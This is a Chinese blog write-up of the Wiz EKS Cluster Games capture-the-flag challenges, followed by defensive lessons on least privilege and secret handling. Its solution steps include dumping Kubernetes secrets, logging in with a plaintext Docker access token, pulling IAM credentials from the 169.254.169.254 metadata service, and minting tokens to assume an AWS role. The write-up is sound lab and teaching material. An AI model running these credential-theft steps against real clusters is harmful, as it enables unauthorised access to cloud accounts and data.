云安全-wiz eks-cluster-games题解与思考

简介: 云安全-wiz eks-cluster-games题解与思考

题目1 Secret Seeker

可以看到有secrets的get和list权限

kubectl get secrets
kubectl  get secrets log-rotate -o yaml

之后base64解码即可

题目2 Registry Hunt

可以看到有secrets的get和pods的list、get权限

由于没有secrets的list权限,我们需要先通过pods来确定secret的名称

kubectl get pods
kubectl get po database-pod-2c9b3a4e -o yaml

查看secret

kubectl get secret registry-pull-secrets-780bab1d -o yaml

之后发现题目的crane工具可以登录

crane auth login index.docker.io -u eksclustergames -p dckr_pat_YtncV-R85mG7m4lr45iYQj8FuCo

下载镜像层

crane pull eksclustergames/base_ext_image base_ext_image.tar
tar -xvf base_ext_image.tar

解压

tar -xvf 193bf7018861e9ee50a4dc330ec5305abeade134d33d27a78ece55bf4c779e06.tar.gz

最后再cat一下就行了

部分尝试

尝试了docker,发现这个节点没有

也无法安装

题目3 Image Inquisition

第二个单词是“盘问”的意思,看来要搞镜像了

可以看到有pods的list和get权限

kubectl get po
kubectl get po accounting-pod-876647f8 -o yaml

看了Hint #1

然后发现,正是我前段时间研究AWS EC2时的文章中写的SSRF安全问题

curl 169.254.169.254/latest/meta-data

查看iam临时凭据

curl 169.254.169.254/latest/meta-data/iam/security-credentials/eks-challenge-cluster-nodegroup-NodeInstanceRole

配置好aws cli后生成密码,并使用crane获取更多信息。

aws ecr get-login-password | crane auth login --username AWS --password-stdin 688655246681.dkr.ecr.us-west-1.amazonaws.com
crane config 688655246681.dkr.ecr.us-west-1.amazonaws.com/central_repo-aaf4a7c@sha256:7486d05d33ecb1c6e1c796d59f63a336cfa8f54a3cbc5abf162f533508dd8b01

ARTIFACTORY_TOKEN就是flag

部分尝试

进行了类似题目2的尝试,失败了,原因是没有权限

进行权限列表获取,失败了,原因是没有权限

题目4 Pod Break

可以看到没有权限了,那就只能通过sts了

aws eks help

生成token

aws eks get-token --cluster-name eks-challenge-cluster

获取secrets

kubectl get secrets --token k8s-aws-xxx

查看具体内容

kubectl get secrets node-flag --token k8s-aws-xxx -o yaml

部分尝试

验证权限,确实没有了

题目5 Container Secrets Infrastructure

{
    "Policy": {
        "Statement": [
            {
                "Action": [
                    "s3:GetObject",
                    "s3:ListBucket"
                ],
                "Effect": "Allow",
                "Resource": [
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2",
                    "arn:aws:s3:::challenge-flag-bucket-3ff1ae2/flag"
                ]
            }
        ],
        "Version": "2012-10-17"
    }
}

允许列出和读取s3桶的对象,那应该就是flag对象了

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::688655246681:oidc-provider/oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "oidc.eks.us-west-1.amazonaws.com/id/C062C207C8F50DE4EC24A372FF60E589:aud": "sts.amazonaws.com"
                }
            }
        }
    ]
}

授权时做了限制,限制了audience和Federated

{
    "secrets": [
        "get",
        "list"
    ],
    "serviceaccounts": [
        "get",
        "list"
    ],
    "pods": [
        "get",
        "list"
    ],
    "serviceaccounts/token": [
        "create"
    ]
}

可以列出或读取secrets/serviceaccounts/pods内容,可以创建serviceaccounts/token

实际上做了限制,只能给debug-sa这个创建token

aws cli没有s3权限,只能先看看eks集群有啥信息了

kubectl get sa

只有sa有东西,不理解,可能权限给多了

debug-sa应该也没用,description写了没有policy。

创建一个token试一下

kubectl create token debug-sa

解密发现和策略的限制能对的上,那看来其实是用debug-sa的

发现并不行,auience是不对的,翻到前面的限制发现audience必须sts.amazonaws.com

加上audience后终于成功了

切换后终于有s3权限了

部分尝试

尝试创建token,没有权限

思考

权限不必提供

攻击到集群,可以执行命令后,首先要做的就是查看权限,常用命令

kubectl auth can-i --list

secret使用时需要注意

base64编码不安全

镜像使用

注意镜像层是否有敏感信息,防止通过docker history等命令暴露;dockerconfig等镜像仓库配置需要保存好。

云上配置

注意RBAC、IAM policy等敏感配置,遵循最小权限原则。

参考

wiz-宣布EKS集群游戏

k8s学习-Secret(创建、使用、更新、删除等)

k8s-私有仓库拉取镜像

容器注册表工具-crane

云原生-AWS EC2使用、安全性及国内厂商对比

aws-cli

aws-ecr工具使用

如何获取凭据

aws-cli-sts

aws-cli-eks

aws-cli-s3

https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html?highlight=assumerolewithwebidentity

JSON Web Tokens (JWT) 在线解密

相关文章
|
算法 安全 Java
CobaltStrike windows7 无法上线
CobaltStrike windows7 无法上线
648 0
|
Kubernetes 前端开发 Docker
使用GitLab CI/CD部署应用到Kubernetes集群的方案
使用GitLab CI/CD部署应用到Kubernetes集群的方案
4057 0
使用GitLab CI/CD部署应用到Kubernetes集群的方案
|
Java 数据安全/隐私保护 C++
一款免配置的浏览器编程工具jupyter,可以同时编写 python,java,c,c++,体积小
一款免配置的浏览器编程工具jupyter,可以同时编写 python,java,c,c++,体积小
684 2
|
7月前
|
存储 JavaScript 前端开发
XSS攻击
XSS(跨站脚本攻击)是攻击者通过网站漏洞注入恶意脚本,用户访问时执行,窃取数据、Cookie或劫持会话。主要分反射型和存储型,危害大。防御措施包括输入转义、白名单过滤及CSP内容安全策略,有效防止脚本注入。
|
8月前
|
人工智能 JSON API
MCP与Function Calling的区别是什么?它们与AI Agent有何关联?
本文解析了MCP与Function Calling的区别及联系。MCP通过条件化提示优化模型输出质量,Function Calling则让模型能直接调用外部函数执行操作。两者共同构成AI Agent的核心能力:MCP负责决策优化,Function Calling实现具体执行。文章还指出了实际应用中的常见问题与解决方案。
|
12月前
|
Kubernetes 负载均衡 Ubuntu
Kubernetes安装详细教程 Ubuntu版
本教程基于Ubuntu 22.04配置Kubernetes环境,涵盖依赖安装、swap关闭、内核参数调整、containerd与Kubernetes组件安装、集群初始化及CNI网络插件部署等内容,并提供常见问题处理方法和相关工具推荐。
|
存储 Kubernetes 应用服务中间件
如何在 Kubernetes 中创建 Pod
【8月更文挑战第11天】
925 1
如何在 Kubernetes 中创建 Pod
|
算法 JavaScript UED
Diff 算法的实现原理
【10月更文挑战第18天】Diff 算法是 Vue.js 中实现高效 DOM 更新的核心机制,通过合理的比较和优化策略,能够在保证界面正确性的同时,最大程度地减少 DOM 操作,提高应用的性能和用户体验。
610 2

热门文章

最新文章